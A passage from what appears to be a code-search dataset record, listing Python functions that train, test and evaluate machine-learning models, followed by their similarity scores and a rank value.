df_sample_list)\n df_sample_list = cu.mape_stability(fy20_mm, \"FY20 MM\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_overall_summay = pd.concat(df_sample_list)\n df_overall_summay.reset_index(inplace = True)\n return df_grp_summary, stability, monthly_stability_check, mape_cov, mape_cov_grp, mape_grp, sh_mm_summary_df, sh_summary_grp, sh_prop_summary, df_overall_summay, var_list", "def test(self, dataset):\n test_accuracy = 0\n test_loss = 0\n num_examples_tested = 0\n # Put model into evaluation mode\n self.model.eval()\n for num, batch in enumerate(dataset.loader):\n xs, ys = batch\n batch_size = len(xs)\n num_examples_tested += batch_size\n iloss, iaccuracy = self.model(xs, ys)\n test_loss += iloss.cpu().data.numpy().item() * batch_size\n test_accuracy += iaccuracy.cpu().data.numpy().item() * batch_size\n test_accuracy = test_accuracy / num_examples_tested\n test_loss = test_loss / num_examples_tested\n # Return accuracy and loss for this model on the test set\n return test_accuracy, test_loss", "def train_model(regressor=DecisionTreeRegressor(max_depth=3, random_state=42),\n dataset_file_name=DATASET_FILE_NAME,\n model_file_name=MODEL_FILE_NAME):\n df = pd.read_csv(dataset_file_name)\n\n # A minumum amount of feature engineering: The player's and opponent's\n # exact score may not be that important for our decisions. The difference,\n # however, certainly is. Moreover, the card value itself is not that\n # important. 
Here, the sum is.\n df['score_difference'] = df.self_score - df.opp_score\n df.drop(columns=['opp_score'], inplace=True)\n df['score_if_card_played'] = df.self_score + df.result_card_val\n df.drop(columns=['result_card_val'], inplace=True)\n\n # Strategy will be to let our model predict the score for different actions\n # Hence, we're going to train the model on that now\n X, y = df.drop(columns='score'), df.score\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)\n regressor.fit(X_train, y_train)\n\n feature_names = ['self_score', 'opp_stands', 'result_stand',\n 'score_difference', 'score_if_card_played']\n\n score = regressor.score(X_test, y_test)\n print(f\"Score on the test set: {score}.\")\n if isinstance(regressor, DecisionTreeRegressor):\n export_graphviz(regressor, feature_names=feature_names,\n out_file=GRAPHVIZ_FILE_NAME, filled=True)\n\n # For persistence, we export the generated model\n dump(regressor, model_file_name)\n return score", "def test(self, test):\r\n self.ml_data.set_target(test[0])\r\n self.ml_data.set_features(test[1])\r\n if self.ml_data.target_type.all() == np.float64 or self.ml_data.target_type.all() == np.int64:\r\n self.model_qua.open()\r\n else:\r\n self.model_quali.open()", "def fit(model, data, test_ids, exp_name, train_ids=None):\n if model.model_type == 'torch':\n size = len(data[0])\n else:\n size = data[0].shape[0]\n \n if train_ids == None:\n train_ids = [i for i in range(size) if i not in test_ids]\n scaler = pka_scaler(data[1][train_ids])\n \n if model.data_type == 'descriptors':\n desc_scaler = StandardScaler()\n scaling_data = data[0][train_ids]\n desc_scaler.fit(scaling_data)\n data[0] = desc_scaler.transform(data[0])\n else:\n scaling_data = None\n \n trained_model = train(model, train_ids, data, scaler)\n results = test(model, trained_model, test_ids, data, scaler)\n model.experiments[exp_name] = {'model':trained_model, 'results':results, 'scaler':scaler, 'desc scaling data':scaling_data}\n return results", "def test_model(model, dataObj, index):\n\t(s,m,l), img = dataObj.__getitem__(index)\n\timg = img.float().unsqueeze(0)\n\t\n\tif next(model.parameters()).is_cuda:\n\t\toutput = model(img.cuda()) \n\telse:\n\t\toutput = model(img)\n\n\ts_pred,m_pred,l_pred = output[0].squeeze(0).cpu(), output[1].squeeze(0).cpu(), output[2].squeeze(0).cpu()\n\ts_pred = s_pred.detach().numpy()\n\tm_pred = m_pred.detach().numpy()\n\tl_pred = l_pred.detach().numpy()\n\n\timg = img.float().squeeze(0)\n\timg = img.permute(1,2,0)\n\n\tfor j in range(22):\n\t\tvisualize(img, s[j], m[j], l[j], s_pred[j], m_pred[j], l_pred[j])\n\t\tk = np.array(s[j])", "def evaluate_model(model, X_test, Y_test, category_names):\n\n print(\"Testing Performance\")\n print(classification_report(Y_test, model.predict(X_test), target_names=category_names))\n\n #Todo cat names", "def test(self):\n self.training = False", "def evaluate_model(model, X_test, y_test):\n # run prediction with test data\n y_pred = model.predict(X_test)\n\n # print precision, recall and f1-score\n i = 0\n for col in y_test:\n print('Evaluation for \"{}\": \\n {} \\n\\n'.format(col, classification_report(y_test[col], y_pred[:,i])))\n i += 1", "def trainModel( self, featureTrain, classTrain):", "def train(self):\n\t\traise NotImplementedError", "def main():\n data = load_data()\n analyze_features(data['full_features'])\n model = train(data)\n\n with open('model.pickle', 'wb') as f:\n pickle.dump(model, f)\n evaluate(model, data)", "def _train_and_evaluate(estimator, output_dir):\n \n 
\"\"\"X_train, y_train =utils._feature_label_split(df_train,\"is_churn\",\"msno\")\n df_val = utils.read_from_bigquery(\"amiable-octane-267022.kkbox.output_val_1\",\"amiable-octane-267022\")\n X_val, y_val =utils._feature_label_split(df_val,\"is_churn\",\"msno\")\"\"\"\n \n df_train=utils.over_sample(\"amiable-octane-267022.kkbox.output_train_1\",\"amiable-octane-267022\")\n X_train, y_train =utils._feature_label_split(df_train,\"is_churn\",\"msno\")\n df_val=utils.over_sample(\"amiable-octane-267022.kkbox.output_val_1\",\"amiable-octane-267022\")\n X_val, y_val =utils._feature_label_split(df_val,\"is_churn\",\"msno\")\n\n estimator.fit(X_train, y_train)\n f1_scorer = make_scorer(f1_score)\n accuracy_scorer =make_scorer(accuracy_score)\n\n if metadata.HYPERPARAMTER_TUNING:\n scores=model_selection.cross_val_score(estimator, X_val, y_val, cv=3,scoring=f1_scorer)\n #,scoring=f1_scorer\n\n logging.info('Score: %s', scores)\n\n #tune hyper\n hpt = hypertune.HyperTune()\n hpt.report_hyperparameter_tuning_metric(\n hyperparameter_metric_tag='F1_SCORE',\n metric_value=np.mean(scores),\n global_step=10000)\n \n#joblib.dump(estimator, 'model.joblib')\n\n # Write model and eval metrics to `output_dir`\n model_output_path = os.path.join(output_dir, 'model',metadata.MODEL_FILE_NAME)\n \n utils.dump_object(estimator, model_output_path)", "def train_and_eval():\n # train_file_name = 'adult.data'\n # test_file_name = 'adult.test'\n train_file_name = 'poker-hand-testing.data'\n test_file_name = 'poker-hand-training-true.data'\n #test_file_name = maybe_download()\n df_train = pd.read_csv(\n tf.gfile.Open(\"/opt/tensor/race_result_clean.csv\"),\n names=COLUMNS,\n skipinitialspace=True,\n skiprows=1)\n df_test = pd.read_csv(\n tf.gfile.Open(\"/opt/tensor/race_result_clean.csv\"),\n names=COLUMNS,\n skipinitialspace=True,\n skiprows=1)\n\n #df_train[LABEL_COLUMN] = (df_train[\"CLASS_Poker_Hand\"].apply(lambda x: x>5)).astype(int)\n #df_test[LABEL_COLUMN] = (df_test[\"CLASS_Poker_Hand\"].apply(lambda x: x>5)).astype(int)\n\n model_dir = tempfile.mkdtemp() if not FLAGS.model_dir else FLAGS.model_dir\n print(\"model directory = %s\" % model_dir)\n m = build_estimator(model_dir)\n print(m)\n m.fit(input_fn=lambda: input_fn(df_train), steps=FLAGS.train_steps)\n results = m.evaluate(input_fn=lambda: input_fn(df_test), steps=1)\n for key in sorted(results):\n print(\"%s: %s\" % (key, results[key]))", "def evaluate_model(model, X_test, Y_test, category_names):\n# Print out Precision , recall F1_score and support for each column using classification_report function\n y_pred_test = model.predict(X_test)\n print(classification_report(Y_test, y_pred_test, target_names=category_names))" ]
[ "0.70706695", "0.64831716", "0.64393735", "0.6433011", "0.64119494", "0.6411802", "0.6275987", "0.624839", "0.62458396", "0.62132657", "0.62124383", "0.6203546", "0.62026036", "0.6191927", "0.6183838", "0.615125", "0.61467177", "0.61371404", "0.6132172", "0.6127471", "0.6120949", "0.6096613", "0.60960996", "0.60893327", "0.6084784", "0.60640055", "0.6060898", "0.60434383", "0.6042966", "0.6038365", "0.6030956", "0.60306555", "0.6020445", "0.6016485", "0.6006332", "0.60006744", "0.6000377", "0.599327", "0.5992853", "0.59862757", "0.5985439", "0.5984907", "0.5984182", "0.5983504", "0.5973042", "0.59484214", "0.5947783", "0.59403145", "0.5936721", "0.5936721", "0.5936721", "0.5936721", "0.5936721", "0.59289986", "0.59288764", "0.59279", "0.5910644", "0.59035456", "0.59029704", "0.59016174", "0.58927417", "0.58919364", "0.58910054", "0.58811814", "0.58795", "0.5879478", "0.5877612", "0.586734", "0.5865855", "0.58624196", "0.5855473", "0.5842631", "0.5834897", "0.5831262", "0.5830949", "0.58277047", "0.5822493", "0.582085", "0.58127457", "0.5811517", "0.5804938", "0.57972646", "0.5796262", "0.5792668", "0.5791089", "0.5789042", "0.5788226", "0.5786669", "0.57853216", "0.578384", "0.57795805", "0.57728654", "0.5771019", "0.5769778", "0.57696056", "0.5769117", "0.57681394", "0.57611364", "0.5758028", "0.57576656", "0.5757561" ]
0.0
-1
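
The record closes with the list of per-negative scores, a positive-document score of 0.0, and a stored rank of -1. Purely as an illustration — the field names, the "higher score = more similar" convention, and the loading code below are assumptions about this dump, not anything it states — a record shaped like this can be used to check where the positive document would land among its mined negatives:

# Minimal sketch (assumptions: the record is available as a dict with the
# fields shown above, and scores are similarities where higher means better).
def rank_of_positive(record):
    # Scores are stored as strings in the dump, so convert before comparing.
    neg_scores = [float(s) for s in record["negative_scores"]]
    doc_score = float(record["document_score"])
    # 1-based rank of the positive document among positive + negatives;
    # a stored rank of -1 presumably marks "not computed / not applicable".
    return 1 + sum(1 for s in neg_scores if s > doc_score)

# Hypothetical usage with a few of the values from this record:
example = {
    "negative_scores": ["0.70706695", "0.64831716", "0.5757561"],
    "document_score": "0.0",
}
print(rank_of_positive(example))  # -> 4: every negative outscores the positive here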